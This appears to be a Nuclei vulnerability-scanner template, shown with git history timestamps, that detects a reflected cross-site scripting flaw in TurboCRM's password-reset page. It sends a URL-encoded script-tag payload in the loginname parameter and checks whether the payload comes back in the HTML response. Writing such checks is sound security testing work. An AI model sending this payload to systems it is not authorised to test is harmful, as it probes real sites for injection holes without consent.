nuclei-templates/vulnerabilities/other/turbocrm-xss.yaml

32 lines
775 B
YAML
Raw Normal View History

2021-04-11 00:22:56 +00:00
id: turbocrm-xss
info:
name: TurboCRM XSS
author: pikpikcu
severity: medium
2021-10-27 11:04:00 +00:00
description: A vulnerability in TurboCRM allows remote attackers to inject arbitrary Javascript into the response returned by the application.
reference:
- https://gist.github.com/pikpikcu/9689c5220abbe04d4927ffa660241b4a
2021-04-11 00:22:56 +00:00
tags: xss,turbocrm
requests:
- method: GET
path:
2021-04-11 11:54:54 +00:00
- '{{BaseURL}}/login/forgetpswd.php?loginsys=1&loginname=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E'
2021-04-11 00:22:56 +00:00
matchers-condition: and
matchers:
- type: word
words:
2021-04-11 11:54:54 +00:00
- '"><script>alert(document.domain)</script>'
2021-04-11 00:22:56 +00:00
part: body
2021-04-11 11:54:54 +00:00
- type: word
part: header
words:
- "text/html"
2021-04-11 00:22:56 +00:00
- type: status
status:
2021-04-11 11:54:54 +00:00
- 200